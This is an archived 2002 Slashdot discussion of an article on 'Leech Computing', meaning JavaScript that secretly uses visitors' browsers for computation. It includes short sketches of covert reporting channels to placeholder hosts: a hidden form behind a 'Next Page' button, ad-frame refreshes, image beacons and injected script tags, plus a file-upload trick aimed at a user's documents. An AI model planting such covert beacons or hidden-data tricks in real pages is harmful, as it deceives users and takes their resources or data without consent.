The Internet

The Theory of Leech Computing

Phil Frisbie, Jr. writes "I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not affect the usability of the client computer and makes no changes to the client'. Leech Computing, Part 1 covers basic theory."
This discussion has been archived. No new comments can be posted.

  • Good news boy! I found an electronics store that carries leeches. Well, actually, it was more of a bait shop...
    • Well, actually, it was more of a bait shop...

      "But back then, instead of calling them bait shops, we called them wet bug parlors. Give me 10 dozen nippers for a nickel, we would say..."
  • Leech Computing, Part 1
    Where have you been leeched today?

    ---

    By Phil Frisbie, Jr.

    Disclaimer

    This article is for personal enlightenment only. It is not a warning of any known current practices or a proposal of future acceptable practices. However, this is a REAL technology, as you shall see for yourself....

    Part 1 of this article contains no real technical details. It is written to enlighten the average web user. Actual working examples with source code will be included in part 2.

    Background

    I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not affect the usability of the client computer and makes no changes to the client'. This leech program runs only in memory, and does not access the client's hard drive at all. Real leeches typically attach themselves to animals that spend time in the water. When a leech is hungry, it attaches itself to an animal, where it either remains until full or is knocked off. If knocked off, it simply finds another animal to attach to. When the leech is full, it drops off, leaving the animal unharmed. The leech needs the animals, so it chooses large ones and takes only a little blood at a time without harming them.

    Leech Computing is related to distributed computing. Distributed computing projects such as SETI at Home and distributed.net have hundreds of thousands of volunteers who have downloaded and installed client software that runs in the background or as a screen saver. Data files are copied between the hard drive of the client and an Internet server in order to retrieve data to process and send back the results. Work is broken up into small units that can take anywhere from a few minutes to many days to complete before the results are sent back. These hundreds of thousands of clients act as one huge computer, which can accomplish much work at a very low cost, since the clients 'donate' their computing time to the project.

    Another technology you may have heard about is Parasitic Computing. Parasitic Computing can use any computer connected to the Internet to process a tiny amount of data. While the idea is intriguing, it is not practical because the computing power needed just to send and receive the data packet is thousands of times more than just processing it yourself. I mention this because Leech Computing and Parasitic Computing share these basic ideas: the user does not know data is being processed, no software is installed, and no system changes are made.

    So how can Leech Computing retrieve data, process it, and return the results without the user knowing it? How can it do this without installing any software? How can it be undetectable by firewall software? All it needs to accomplish these seemingly impossible goals is one piece of common software, a web browser.

    The web browser is the most used piece of software today. Millions of users are logged in at any given time of the day browsing web sites, checking email, making purchases, etc. Since the first web site was put online about ten years ago, web pages have gone from plain text pages to the current flashy looking sites we have today. The web browser has evolved to provide the capabilities to support these needs.

    One of the first web browser enhancements was JavaScript and Java applet support. JavaScript and Java applets are programs that run in your browser. While Java applets can potentially cause security problems and are disabled by some users, JavaScript has no serious security problems and so is seldom disabled. JavaScript is also the most widely used tool to enhance web pages because it is easy to use and very versatile. Most any time you see cascading menus, moving text, or forms that warn you when you enter the wrong type of data, you are running JavaScript programs. In fact, you could say that a fancy JavaScript page is leeching some of your computer resources in order to create all those fancy effects.

    But, while web pages currently use JavaScript and other types of programs to process data to display, they generally do not send results back to a server (with the exception of forms the user may fill out and send). From now on, when I refer to a leech program, I will be referring to a JavaScript program. Even though other types of programs such as Java applets and ActiveX controls could also be used, they may be disabled by the user, they may need to be approved by the user before they are run, and they do get installed to the user's hard drive.

    Simple examples

    This is going to be theory only; no actual working code will be presented here. Again, part two will include actual working examples with source code.

    Getting the data to the user is the simple part; it is simply embedded in the web page. Scrolling messages are a common example. Even though one line at a time might be displayed, all of them are loaded into the page. Or that cascading menu, which has all the submenus loaded ready to display when needed.
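    For instance, the page might carry its payload like this (a minimal sketch, not code from the article; it assumes a 'ticker' element on the page, and the work-unit numbers are purely illustrative):

    <script>
    // The visitor only ever sees the scrolling messages; the second
    // array is the leech's raw material, loaded along with the page.
    var messages  = ["Welcome!", "Check our specials", "New items daily"];
    var workUnits = [104729, 1299709, 15485863];
    var i = 0;
    function tick() {
        document.getElementById("ticker").innerHTML = messages[i];
        i = (i + 1) % messages.length;
        setTimeout(tick, 3000); // keep scrolling, like any marquee
    }
    window.onload = tick;
    </script>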

    So, current web pages are already using JavaScript programs, and we know that data is being sent and processed to display that cascading menu when you run your mouse over it, but how could you possibly get data back to the server without the user knowing it?

    One way would be to persuade the user to perform the upload of data. Remember, forms can submit data back to a server. We fill out forms and send them regularly. But forms can also have hidden information that the user does not need to fill out. In fact, a form can have ONLY hidden information; all it needs is a button for the user to click. Of course, you would not label such a button 'Click here to submit hidden data', but what if it were labeled 'Next Page'? How many times have you pressed a button like that without even thinking about it? When the user presses the button, the leech submits the hidden data and redirects to the next page. As long as the user gets to the next page, they will not have any reason to think that the button had any other function.
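    A minimal sketch of such a form (the action URL and the leechResult variable are hypothetical placeholders):

    <form name="report" action="/nextpage.cgi" method="post">
        <!-- filled in by the leech before the user ever clicks -->
        <input type="hidden" name="result" value="">
        <input type="submit" value="Next Page"
            onclick="document.report.result.value = leechResult;">
    </form>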

    Another way would be to use a self-refreshing window. You know, like those annoying pop-up or pop-under advertisements. Or maybe something less conspicuous like a framed advertisement on a web page. When done with the current data, the leech can upload the processed data and get new data along with the new advertisement. Would you even notice, or even wonder about that advertisement refreshing? Of course not, because it is so common.
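    A rough sketch of the refresh trick, as it might run inside the ad frame (the server name, processChunk(), and currentData are hypothetical):

    <script>
    // When the current chunk is done, request the 'next ad': the finished
    // result rides out in the query string, and the reply carries a fresh
    // advertisement along with fresh data to crunch.
    function cycleAd() {
        var result = processChunk(currentData);
        window.location = "http://ads.example.com/next.cgi?r=" + escape(result);
    }
    setTimeout(cycleAd, 30000); // refresh every 30 seconds, like any banner
    </script>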

    Conclusion

    The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.

    Can it be prevented? That is the best/worst part, depending on your point of view. Since a leech can simply be a JavaScript program, nothing short of disabling JavaScript can stop it. And if you do, you will greatly reduce your web browsing experience, and will even be locked out of many sites that require JavaScript to be enabled.

    Part 2 will be posted soon.

    Phil Frisbie, Jr.

    ---

  • by PowerTroll 5000 ( 524563 ) on Tuesday February 19, 2002 @04:02PM (#3033725)
    Spyware [spychecker.com] seems to fit this definition as a less-appreciated form of leech computing.
    • by bananapeel17 ( 311593 ) on Tuesday February 19, 2002 @04:17PM (#3033843) Homepage
      I recently ran Ad-Aware [cnet.com] on my windows box and was surprised to find there were 4 spyware programs installed and running, and remnants of 3 more existed in the registry. And I thought I was being careful...
    • Or for the more lazy... You can download Adaware from their main site here [lavasoftusa.com] (but it's temporarily down) or get it from cnet.com here [cnet.com]. This will scrub your computer of spyware you have now on it. I would periodically use it as well.

      While browsing, you could also run a blocker in addition to your firewall. Maybe something like SpyBlocker, which will block malicious bugs, cookies, ads, spyware, and worms. This can be downloaded here [bellsouth.net].

      That should keep your computer covered.
  • Slashdotted (Score:4, Funny)

    by selkirk ( 175431 ) on Tuesday February 19, 2002 @04:03PM (#3033731) Homepage
    Step #1: Leech off of someone with lots of bandwidth.
    • Step #2: Congratulations, you have found Slashdot. Now present a theory and have the /. users write down the practical ideas which will be "Leech Computing, Part 2".
      • Re:Slashdotted (Score:2, Informative)

        by PhilFrisbie ( 560134 )
        I don't need /. readers to write part 2 for me....I am already working on the CGI program and JavaScript for the demos.
        • It appears that you need /. readers to tell you to scrap the red font on a black background. I usually don't flame people, but come on, even porn sites gave that up in the 1980s. When part 2 comes out, I'll save the page, edit out your colors, and view it locally.
  • by 2nd Post! ( 213333 ) <gundbear@pacbe l l .net> on Tuesday February 19, 2002 @04:03PM (#3033739) Homepage
    I can almost imagine someone writing a server-side dynamic JavaScript generator on Slashdot in order to disseminate SETI data to web browsers to crunch (albeit very tenuously), to be uploaded again whenever someone hits 'submit' :)
  • that can process data and report back the results

    Sure: passwords, logins, mails, other confidential data, or perhaps your son's pr0n collection... or does it only report the results (filenames, etc.)?
    This reminds me of some popular trojans for Windows (SUB7BONB)!
    • I recently saw a page using JavaScript that was able to upload files from the user's HD to the server, without triggering any sort of security warning or pop-up dialog in IE5.

      It had a button marked 'Browse' that the user used to select which file to upload, and then the user hit Submit to send the file. But, uh, is there really that much keeping the other system from selecting a file 'for the user'?

      Heck, just defaulting to all files under 100k in the default document save location of Excel would be enough to get at least a few credit card or even Social Security numbers.
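      The naive version of that attack would look something like this sketch (the path is illustrative). As it happens, browsers are supposed to ignore a preset value on a file input, and to block scripts from setting one, for exactly this reason:

      <form action="/collect.cgi" method="post" enctype="multipart/form-data">
          <!-- the preset value is silently discarded by the browser -->
          <input type="file" name="f" value="C:\My Documents\finances.xls">
          <input type="submit" value="Next Page">
      </form>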
  • Well.. (Score:4, Funny)

    by ch-chuck ( 9622 ) on Tuesday February 19, 2002 @04:05PM (#3033753) Homepage
    what else is Mr. & Mrs. Home User's new 2.4GHz, 510MB, 120GB system running XP, purchased just to send an AOLgram to Missy at college once every weekend, good for?

    • Someone should sign them up for distributed.net :)
  • A professor in our department hired a research assistant a while ago, who worked for him for about a year. After the assistant left, the professor noticed that his computer was running really sluggishly at all hours, but because he wasn't really familiar with the system, he assumed it was just getting slower from all the data-processing algorithms he was running.

    A couple of months later, the network admin starts nosing around, and sends the professor an embarrassing note asking him to take down the web server about hot leather pants running on his computer, since it was overloading the network...
  • Nice idea, as long as your clients know what they've got on them and are willing to monitor the leech's connections 24/7 to make sure no one's retrofitted them with a malicious payload. Which is to say they aren't, which is to say I'm about as gung-ho to see these out in the wild as I am Magic Lantern.
  • Idea (Score:4, Insightful)

    by autocracy ( 192714 ) <slashdot2007@sto ... .com minus berry> on Tuesday February 19, 2002 @04:07PM (#3033769) Homepage
    Can we use this to create a distributed webserver where each person who visits the site will serve copies of it? This guy's system could definitely use it! SLASHDOTTED
  • by werd life ( 94886 ) on Tuesday February 19, 2002 @04:11PM (#3033793)
    Parasitic computing is getting other machines to perform calculations for you, while only using legitimate services. There is a great article here [sciencenews.org]

    There's also a good page quickly discussing Villain-to-Victim [uni-erlangen.de] computing. The point is to use correctly configured machines to do things they were not intended to.

    • His article says:
      Another technology you may have heard about is Parasitic Computing. Parasitic Computing can use any computer connected to the Internet to process a tiny amount of data. While the idea is intriguing, it is not practical because the computing power needed just to send and receive the data packet is thousands of times more than just processing it yourself. I mention this because Leech Computing and Parasitic Computing share these basic ideas: the user does not know data is being processed, no software is installed, and no system changes are made.

      Please try to read the article before you go making redundant peanut gallery comments. The link you provided is helpful, though.
  • We (students) once turned one of the computer rooms into a MOSIX cluster.
    Although we users knew about it (unlike this leeching), it was to the same effect: processes would migrate and spread the workload.

    Once MOSIX gets pthreads support (it hadn't last time I checked; I don't know, they were working on it), I think MOSIX would be a good thing to install even in offices. Your workstation being part of a cluster would make it last longer (i.e., more time before it's too slow to use and you upgrade all the office PCs).
  • Interesting concept (Score:4, Interesting)

    by GreyPoopon ( 411036 ) <gpoopon@gmaOOOil.com minus threevowels> on Tuesday February 19, 2002 @04:13PM (#3033809)
    Conceptually, I find this interesting. It can run without user notice. The only problem is that it does steal CPU cycles, and as far as I know there is no real way in Javascript (or Java applets) to make the program run only when it isn't competing with other applications. I can imagine that some users might get really upset because you are stealing their computer resources. Because of this, I wouldn't recommend doing this kind of thing without notifying the user and perhaps giving them the option to turn it off. However, I can see some potential uses for this as long as the user is aware. For example, slashdot viewers probably wouldn't mind some leech Javascript working on the latest encryption cracking contest, especially if they got to "share the wealth."
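    (There is no true priority control in JavaScript, but a rough half-measure is cooperative chunking: do a sliver of work, then yield with setTimeout so the browser stays responsive. A sketch, with buildWorkQueue() and processUnit() as hypothetical stand-ins:)

    <script>
    var queue = buildWorkQueue(); // hypothetical: collect embedded work units
    function crunchSome() {
        var stop = new Date().getTime() + 50; // work for ~50ms per slice
        while (queue.length > 0 && new Date().getTime() < stop) {
            processUnit(queue.shift());
        }
        if (queue.length > 0) setTimeout(crunchSome, 200); // yield to the UI
    }
    crunchSome();
    </script>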
    • So how much are you going to pay me for leeching my CPU time? The only reward I want is cold, hard cash.
    • I can't remember if it was in Hacker Crackdown or The Cuckoo's Egg where they talked about how one of the hackers was busted for illegal use of electricity. By running processes on the remote machine he was running up their electrical bill just a little bit more, but it was enough under the law to nail him. I think the case referenced occurred in Britain; I'm not sure if it would apply in Canada or the US.
      Damn, it's been so long since I read those books. Anyway, if you catch someone leeching, the option to prosecute should be there, because they ARE stealing from you in one form or another when using your computer without permission.
    • as far as I know there is no real way in Javascript (or Java applets) to make the program run only when it isn't competing with other applications.

      Java can do it easily. Something like (warning-untested code):

      // Assumes the applet class implements Runnable, as noted below.
      Thread t = new Thread(this);
      t.setPriority(Thread.MIN_PRIORITY); // renice ourselves downward
      t.start();

      If the applet class implements Runnable, the above code will start a thread with minimum priority, so it will nice itself downwards. If I recall correctly, even secure systems allow you to renice yourself *downwards*. I used to even be able to get IE to let me run at max priority!

      So to summarize - yes, it can be done, and rather easily at that.
  • Mipsucking recycled (Score:3, Interesting)

    by kiick ( 102190 ) on Tuesday February 19, 2002 @04:17PM (#3033835)
    Wired had an article [lycos.com] about this way back in '97.
    They called it mipsucking. The idea was to skim off CPU cycles when someone visited a web site. They even had a sample JavaScript app.
    • I don't see how this would be a better use of computing resources than just using your own servers to do the work. What the author of Leech Computing should have done is break the problem down to its measurable elements.

      Here is some of what would have to be considered:

      1. Length of time the average user will be viewing a page or ad (the computing benefit realized)
      2. Computing cost of serving this page up to the user
      3. Computing cost of collecting and organizing the data from leeched / mipsucked users
      4. Monetary cost of either building an interesting site to attract "hosts" or riding an advertisement or other element of someone else's interesting site

      I would say that focusing on maximizing your own server resources would be a far simpler way to get your computing task done. As a "free" alternative, the voluntary donation of computing resources (as in the SETI project) answers concerns #1 and #4 far better than leeching.
  • by Bonker ( 243350 ) on Tuesday February 19, 2002 @04:17PM (#3033842)
    Say you're running a 1.5GHz machine and browsing the web. Chances are, even if you're playing MP3s in the background, you're using less than 5% of your processor cycles. If you could trade another 50% of those cycles you're not otherwise using for the ability to kill ads or for access to a restricted site, would you?

    (I can see it now. 50 to 100 years from now, the Porn Website Coalition has won a Nobel prize for creating a vast distributed network for math intensive problems....)

    The problem with this model is that the implementation of JavaScript is slow and horrendously messy. It's brutally inefficient for anything other than the most minor effects carried out in a browser window. I shudder to think of what most browsers would do, given a math-intensive task. FFTs in JavaScript, anyone?

    Unlike the author, I think that Java and/or ActiveX applets will probably see this sort of exploitation first, since they're easier to tune speed out of.
    • yep, absolutely right - if I'm browsing Slashdot on my G4 450dp with iTunes running, I can run dnetc from the terminal at 7.5Mkeys without any noticeable performance hit (if I use Omniweb at least, other browsers don't seem to be as threaded and get all choked up on me). Just proves how much excess power modern computers have - 8Mkeys when running by itself, 7.5 Mkeys when running with Omniweb and iTunes.
    • The other problem is there is no money in distributed computing.

      No one really has come up with a math-intensive problem that distributes well, that also can make money.
    • I'm sure I'm remembering correctly that Juno, a free, ad-sponsored ISP, was either going to, or had announced their intention to, have their users either migrate to a paid plan or run some kind of drug-analysis program on their machines. I think their EULA even had a line that required that end users' machines run 24/7, but they were not planning to actually enforce that clause.
      From what I've seen in the field, Joe Average Windows user really doesn't multitask anyway, so there are lots of idle CPU cycles connected to the Internet. I've processed 89 work units for SETI@home on my machine.
  • by RussRoss ( 74155 ) on Tuesday February 19, 2002 @04:18PM (#3033859) Homepage
    At least on Linux systems, the scheduler behavior is definitely affected by even a single low-priority (nice value 19) task. I run distributed.net clients full time on my system and generally it's not a problem, but sometimes when running another CPU-bound interactive job (playing back movies or MP3s, playing games on an emulator, games in general) the effects are noticeable.

    When I was an undergrad I did a semester research project on this and identified some of the problems:

    http://www.russross.com/cs261/paper.html [russross.com]

    I run a dual-CPU machine now, which generally masks the problem, but even the fastest single-CPU systems will suffer noticeable effects once the scheduler falls back to a round-robin scheme with weighted timeslice lengths, which is essentially what happens once you have two or more CPU-bound jobs competing for CPU time.

    - Russ

    • I've been running with the -mjc patch for a while now... the other day I decided to see what would happen to my MP3 playback if I tried to drive up my load average. make -j on the Linux kernel pushed my average up to about 180 before FreeAmp skipped, then I ran out of file handles and the make began to die. Incidentally, I met the OOM killer when I tried make -j 200. It didn't run out of file handles that time, but the average got up to about 150 and then xterms started disappearing. FreeAmp didn't skip, but it got wedged trying to load the next file on the playlist, and was killed a few seconds later, along with the make.

      This is a single-processor Duron 800 with 512MB, so I was impressed, to say the least.
    • Hasn't it always seemed like tomorrow's CPUs were going to deliver so much performance you could share the excess capacity? Except that the OS/Apps of tomorrow always seem to grow to suck up that CPU so there's never any extra to hand out.
  • This is going to sound like a "me too" post, but I'd actually considered writing something like this in Perl, though I've been hampered by the fact that I don't own a computer...

    Consider though:

    • Use a server running Apache to create little tasks and accept requests by sending out XML packets as replies.
    • A language that can upgrade itself on the fly (I need *this* version of the library, go fetch..)
    Home parallel processing .... wish I had hardware so I could code it.. (redundancy/relocation/poor - should end soon though....)
  • by Arethan ( 223197 ) on Tuesday February 19, 2002 @04:21PM (#3033877) Journal
    A more effective solution would be to have operating systems ship with distributed computing clients pre-installed. That way, if it's ever on the net, it'll be able to do work.

    The current implementation of Leech Computing requires the user to be surfing around with a web browser. My solution would be on every OEM PC sold. Seems like a more useful setup to me.

    Yes, there are security implications, but only as much as having any self-upgrading piece of software running in the background. (Besides, I never said Microsoft was the company I'd pick to make the software. ;) And even if it did get hacked, you could have it running in a sandbox so that the system's integrity would never be jeopardized.

    The people buying computers these days are pretty clueless. I've seen people buy computers without having even used one before. Just because it's the 'in' thing. We might as well put all that wasted processing power to good use!
  • I believe we have discovered the first really innovative use for Java. Think about it: web delivered, platform agnostic (it's supposed to be), and quiet. A simple Java app that loads, performs its job, sends the results back, and dies.

  • Slight Surprise (Score:5, Interesting)

    by rgmoore ( 133276 ) <glandauer@charter.net> on Tuesday February 19, 2002 @04:26PM (#3033903) Homepage

    The one thing that surprised me a bit was that the author didn't take advantage of the opportunity to put a bit of leech computing onto his own web page. He mentions (on the second page) that:

    Of course, you would not label such a button 'Click here to submit hidden data', but what if it were labeled 'Next Page'? How many times have you pressed a button like that without even thinking about it? When the user presses the button, the leech submits the hidden data and redirects to the next page. As long as the user gets to the next page, they will not have any reason to think that the button had any other function.

    Then I remembered that there was, in fact, just such a button on the first page. But when I went back to check, there wasn't actually a Javascript applet there trying to leech a little bit of computing power from me. There wasn't even a cute little message thanking me for checking to see if there was such a Javascript applet. Too bad, he missed a great chance.

    • Re:Slight Surprise (Score:1, Informative)

      by Anonymous Coward
      It wouldn't have to be a button; just about any event on the page can be made to execute a JavaScript function: page load, page exit, link clicks, entrance/exit of form fields, mouseovers of various sorts...

      The user might never realize the event had occurred.
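      For example (a sketch only; startCrunching() and reportBack() are hypothetical):

      <script>
      window.onload = function() { startCrunching(); }; // begin on page load
      window.onunload = function() { reportBack(); }; // upload on exit
      // ...or hang the same calls off any onclick, onsubmit, or
      // onmouseover handler already on the page.
      </script>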
      • It wouldn't have to be a button; just about any event on the page can be made to execute a JavaScript function

        If that were the problem, it would be obvious you'd want to do it when the computation was complete. You're already running in the background, just execute one last thing when it's done.

        The problem is that you need to contact the server and the standard way of doing that is to send a page request with form submit data, which usually needs the page to be reloaded at least.

        Of course, there's probably sneaky ways around that, like doing a submit as a background image preload or something. (I don't know, can you directly manipulate sockets in javascript?)
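        There are no sockets available to JavaScript, but the image-preload guess works; a sketch (the server name is illustrative):

        <script>
        function reportBack(result) {
            // Requesting a 1x1 'image' smuggles the result out in the URL;
            // nothing reloads and nothing visible appears on the page.
            var beacon = new Image();
            beacon.src = "http://collect.example.com/log.cgi?r=" + escape(result);
        }
        </script>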
    • Re:Slight Surprise (Score:3, Interesting)

      by edrugtrader ( 442064 )
      http://hotwired.lycos.com/packet/packet/schrage/97/01/index1a.html

      The guy who wrote this article in '97 has a JavaScript that calculates pi while you read the article!
  • Leech Computing(TM) is as pervasive as HTML. Ads (especially distracting ads) are leeching off of my brain power. They attempt to influence my browsing and buying behavior by first getting my attention and then communicating something to me. They are the cost for all of the free stuff I use daily, so I'm not complaining.

    Would you even notice, or even wonder about that advertisement refreshing? Of course not, because it is so common.

    Conclusion

    The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.
    • The technology to implement Leech Computing is here, now. Is it being used? I have not found any evidence, but I also do not look at the source code to every web page I download. Maybe I should.


      Yet another example of how knowing more about a problem only requires you to work even harder in the future.

      Ignorance truly is bliss ;)
  • by Anonymous Coward
    How about ghost ships and zombie processes? Whether intentional or accidental, the results are the same. But then, I'd hope that "the article poster" wasn't looking at this from a Winblows- or web-centric point of view. Sounds like someone looking to kick up their web-hits page. Move along, no news here.

    JerryMeander, posting w/o an account for 5 years (egads, it's been a long time) and will continue doing so (I'm just too lazy to look up my lost password, or recreate my account)
  • In the second page, the author suggests that one way to get the applet to send the data back is to disguise it as a form, even a form with all hidden data and only a button to click... what if the button just said "next page"? To read the page where the author suggests that, you have to click a button that says "next page". Have we all just been unwitting participants in an experiment to see if the theory works? Or was it just the 3 or 4 /. readers who actually go out and read the articles?
  • I don't really see how this is TOTALLY possible... I see how you can abstract it until it feels like it's working, however...

    I.e., OK, you don't want to install the program, since that would be changing the client, so all computers voluntarily run a sandbox... That sandbox runs as the System Idle Process, or niced down a ways... Even given THOSE conditions, a would-be interrupt would have to change context from that program into its own code (incidentally, it would have to even without it, but for the sake of argument), and the processor will be giving off heat when it could be sitting idle...
  • It's easy enough to hide a window in the background, much like a pop-up ad would. This window would auto update to send information back to the server.

    Particularly vicious would be a virus that could harness this power and then redirect it en masse to DoS-attack a specific target.

    This concept is very interesting.
  • What I would like to see is a p2p system that has leeching turned on by default. One of the reasons why napster was so successful was because every file a user downloaded was shared regardless of whether they knew it or not. Imagine having a p2p system where the installer would automatically take a percentage of the user's HD space to share files that they don't even download. Instead these files are automatically propagated to high bandwidth peers throughout the network. The files that are mirrored would depend upon their popularity. The only problem with this would be that you probably could not have a completely decentralized network since you need a central server to keep track of downloads in order for the most popular files to be automatically mirrored.

    This automatic mirroring would be an easy way to kill the Slashdot effect when it comes to sudden demand increases for specific files on a P2P network (think Starr Report). Of course, one could argue that with sharing on by default a popular file would have plenty of mirrors without such a system, but it would help in situations where time is critical.

  • Imagine Google, or even Slashdot, using this to alleviate some of their huge (well, Google's anyway) computing needs. I certainly wouldn't mind lending a few of my CPU cycles to Google if it meant my searches became more accurate.

    "Don't let ego cloud your judgement, but don't let humility cloud who you are." -- Captain Squal
  • Leech computing?
    I thought it was Lich computing, which is much more horrifying...
  • Well, it seems that if something is greedy, self-serving, and intrusive, it doesn't necessarily have to come from government after all!

    It may be even easier to do than I thought at first, but some of the problem for people like me with persistent connections can be alleviated by:

    1. Serious firewalls (not much good, but could at least make it harder for a targeted attack if the Java virus steals password data).

    2. Running Java only when necessary (what a pain).

    3. Monitoring your bandwidth (my Primary Internet router actually has an LED meter of sorts).

    Still, any code brought in by clandestine means, that operates without the user's knowledge or permission, is "malicious code," and perpetrators should be considered dorks.

    It doesn't matter if the user is using the machine up to what you consider its potential. It's Not Your Machine!

    I wonder how many of the people who think this idea is "kewl" and think those users won't be hurt spend their spare time railing against "corporate greed." :)

    Oh, well, one more genie out of the bottle.

  • by SirSlud ( 67381 ) on Tuesday February 19, 2002 @04:47PM (#3034024) Homepage
    > how could you possibly get data back to the server without the user knowing it

    He says refreshes and 'tricking' the user (into form submits) are the only ways. Wrong.

    dynamic.php:

    <script>
    // ...data embedded in the page...
    // ...do the calculation on the client...
    var me = answer;
    document.write("<scr" + "ipt src='http://myserver.com/donate.js?answer=" + escape(me) + "'></scr" + "ipt>");
    </script>

    That sends some data to the client, does some client-side calcs, and sends the data back to my server (although I have to respect the max limit on how much data one can send via form posts, but it's the same with his more obvious methods).

    This is done all the time to count impressions in the advertising world. In fact, in a sense, advertising tracking online is already leech computing in some implementations.

    BTW, the "</scr" + "ipt>" is split up so the browser doesn't read it as the close of the top-level script tag.
  • by Cy Guy ( 56083 ) on Tuesday February 19, 2002 @04:47PM (#3034025) Homepage Journal
    As described in this BBC article, when we talked about leech computing, we meant leech computing [bbc.co.uk].

    As for the definition given in today's write-up, I don't see why it has to be without the user's knowledge. As mentioned elsewhere, that is 'parasitic computing', and while leeches are parasites, humans for millennia have harnessed all sorts of parasites, including leeches, to perform tasks beneficial to humans. Anyone installing seti@home on their PC is in effect parasitizing their box, but because it is only the spare cycles that are being used, you are none the worse for it, and there is a net benefit. A true non zero [amazon.com] solution.

  • .. in the advertising industry.

    Strictly speaking, many of the impression-counting mechanisms that advertisers rely on can include leech-like implementations (a.k.a. 'beacon' tracking) that are arguably not leech computing only because the tracking mechanism is via img tags more often than script tags. And counting one impression per ad view is hardly utilizing 'computing power', but it doesn't change the fact that there can be more than one request (in parallel off the placement, a.k.a. the web page) to ad servers to create a complete impression.
  • In 1988, a guy named Robert Tappan Morris had this crazy idea: take over people's computers but only use their spare cycles to (I believe) solve one hell of a math problem. Guess what happened next...
  • MS Windows.
  • Really, the methods he mentions, my browser already blocks.

    "Tell me when I am about to submit data in a form"

    "Disable (or 'warn me about') active scripting/Javascript/Java/ActiveX"

    Am I the only person that uses these settings as my standard configuration?

    Yes, this doesn't apply to "Joe Home User" but that is a matter of installation defaults, and Microsoft already said they'd switch to "secure by default" settings. (I should have tried harder resisting that dig.)

    But really, Javascript *is* blocked by 'paranoid' security settings in browsers. And so is submitting form data. Though I haven't yet seen anything that tells you *what* data the form is submitting, without having to view source.
  • I am defining Leech Computing as 'a program running on a client computer without user knowledge that can process data and report back the results, but otherwise does not effect the usability of the client computer and makes no changes to the client'. This leech program runs only in memory, and does not access the client's hard drive at all.

    And how is this different from a classic [pre-Morris] computer worm? The original idea of a computer worm, after all, was a piece of code that would seek out under-utilized computers and run your code on them without disrupting normal operation. Morris's worm, for that matter, could have acted that way (arguably it was intended to) if it had been better debugged.

    -JS

  • For years, I've been stealing cycles and running programs in the background on the computer belonging to a coworker. She never complains as she 1) runs linux, 2) has a dual 1G PIII with lots of RAM, and 3) can still edit/compile/test with my jobs running.

    Back in '94, her computer also served as our print server....

  • www.filefront.com

    Take a look at the "client" they have you install to obtain games. It uses 'P2P', which is, in their words, a good thing. In reality, it installs a program that sucks up your bandwidth so fast you won't be able to play that Day of Defeat mod you just downloaded from them.

    I know this, because it only took me 2 minutes to find out my roommate had installed it and we immediately had 5 different connections trying to hit his machine. Amazing how quickly that program can bring a DSL connection to its knees.
  • Processes that computed quietly in the background used to be called daemons. The concept of daemons is more general than leeches, but encompasses them.
  • by Spackler ( 223562 ) on Tuesday February 19, 2002 @05:57PM (#3034536) Journal
    but it may sound like one. (It is not MS bashing, either.)

    I have always wondered if Microsoft has done something like this in their operating systems. If they were sneaky, the "System Idle Process" would be doing a lot more than advertised. It never registers on the CPU counts, even though it is running at 99% of the CPU most of the time. The OS is closed source, so nobody could review it. Just a few ticks here and there, times 50 million. Have the website scoop up data and distribute the next session (it would be missed because you were doing a Windows Update or checking for the latest security-hole fix). Get a nice new registration scheme that gives the PC its new job codes.
    I'd sure be doing it if I were them and I had that many captive PCs.
  • This strikes me as theft, plain and simple, if the folks doing it don't ask for your permission first. What I would want is a utility which detects these intrusions and then sends back fifty megabytes of bogus data over my cable connection...see how long the theft lasts when they continually get slammed with garbage.

    Max
  • This is brilliant.

    Why not create a Java applet that does distributed.net work (or similar), proxied through the web server? Slashdot could have it on its main page (hell, it could be that Slashdot logo in the corner). Some clever person could submit all the work done as his or her own. Sure, running in Java only part-time would limit the amount that would get done, but given the number of computers sitting on Slashdot at any given moment, it could accomplish a lot cumulatively...

    I'm not familiar enough with web Java applet security policies to know how tricky this would be, but it'd be interesting, anyway.

    -Puk
  • I'm going to assume for now that the author goes for something using JavaScript:
    #1. JavaScript is extremely slow. It's also interpreted, not compiled. Code optimized and compiled for a system can be a hundred times faster.
    #2. Coding anything usable for this type of application would require a good bit of code to be sent via JavaScript.
    #3. The amount of processing it would take to:

    A) Generate the web page to send to the user with the appropriate JavaScript code + whatever the user needs to process
    B) The user's computer to interpret the JavaScript, execute the code, and send back to the main host computer
    C) Host computer receives the data, decides where to store it, what to do with it, etc.

    And for the code to run and NOT affect the user significantly (meaning the processing done wouldn't be very much at all), all in all it would likely require far more processing than it would if it were compiled and running on a server just by itself.

    All in all it would be very inefficient, and probably faster for the server managing the data and generating the pages to process this information on its own.
